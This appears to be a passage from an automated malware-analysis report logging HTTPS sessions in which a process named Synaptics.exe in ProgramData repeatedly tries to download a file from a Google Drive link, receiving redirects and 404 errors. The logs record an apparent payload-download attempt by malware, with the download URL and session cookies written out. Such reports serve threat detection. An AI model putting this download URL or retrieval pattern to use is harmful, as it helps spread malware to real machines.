                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:40 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:40:40 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="Zf1ckonA-s04Pmjr0eLlDg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:40:40 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      10 | 192.168.2.6 | 49787 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:40 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:41 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:40 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Ip84VHt9ogYlwDbpHJF3LA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      11 | 192.168.2.6 | 49788 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:40 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-30 10:40:41 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:41 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-EQYbhFgl9iFIhH2iVtNjfw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49789 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:40:40 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
2024-12-30 10:40:41 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC7xEof4pDMmkxt_skBhEHWxQjELhKVQKgpdujZDIBk3nTAlTM0QS8DIBG8ZZ3b2QDJj
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:41 GMT
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-f52LIjg0UGkvyMRF-ahcfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
2024-12-30 10:40:41 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:40:41 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="Gt_fwvWEU-sA9T93hTVxQQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:40:41 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49790 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:40:40 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
2024-12-30 10:40:41 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC76cqJ3W25Jf1booRyStDEV_5AI1mbZPmTsBrO-1sHDjuqS0ngSxnD17p6MmIa8_j_Y
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:41 GMT
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-2H8NIJIPIxxXHn2Uold6fA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
2024-12-30 10:40:41 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:40:41 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="f9u-7gF9N7TgNBqZ8AhGlg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:40:41 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49799 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:40:41 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 49800 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:40:41 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 49811 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:40:42 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
2024-12-30 10:40:43 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:42 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-eWFA5zpl0JIyQKWGkU4hvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 49812 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:40:42 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
2024-12-30 10:40:43 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:42 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-wt_epjRkOGANA8H04kRH_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 49820 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:40:43 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
2024-12-30 10:40:43 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:43 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-I_uYRCxRpQQ-EnHABk6aUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 49821 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:40:43 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
2024-12-30 10:40:44 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC6XqTKpAo8Mf7zqzLQYBwoBraZhle8kX_FUVcvq5PTSxbxoyIY9LtffNnk5hHN_N7v9
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:43 GMT
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-uAzPdoq_joE27Lj2D-nmdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
2024-12-30 10:40:44 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:40:44 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="S2YmiobKq-UwXI3ZeoAwpQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:40:44 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 49822 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:40:43 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
2024-12-30 10:40:44 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC6m3OBeC9iOe3ClVYOpwg_Fa6toqdSbJjE_AO1Bn9V1d79laz448qBqUopzjWZprPzgPihTV1Y
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:43 GMT
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-9sP9v-uIb4I-kf1aiYy1Jw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
2024-12-30 10:40:44 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:40:44 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="fYR7kPWL-8XsFQHaj0__fQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:40:44 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 49823 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:40:43 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
2024-12-30 10:40:44 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:43 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-FvRaES_PEqnjW17cbjPPkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 49832 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:40:44 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
